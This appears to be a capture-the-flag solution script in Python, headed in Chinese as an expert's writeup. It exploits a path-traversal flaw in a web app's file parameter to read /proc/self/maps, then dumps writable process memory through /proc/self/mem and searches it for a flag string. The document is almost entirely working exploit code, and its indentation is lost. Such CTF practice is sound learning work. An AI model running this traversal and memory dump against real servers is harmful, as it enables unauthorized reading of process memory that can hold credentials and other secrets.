获取flag脚本,PS:大佬的Writeup
import requests
import re
baseUrl = "http://IP:端口/info?file=../../../../.."
if __name__ == "__main__":
url = baseUrl + "/proc/self/maps"
memInfoList = requests.get(url).text.split("\\n")
mem = ""
for i in memInfoList:
memAddress = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
if memAddress:
start = int(memAddress.group(1), 16)
end = int(memAddress.group(2), 16)
infoUrl = baseUrl + "/proc/self/mem&start=" + str(start) + "&end=" + str(end)
mem = requests.get(infoUrl).text
if re.findall(r"{[\w]+}", mem):
print(re.findall(r"\w+{\w+}", mem))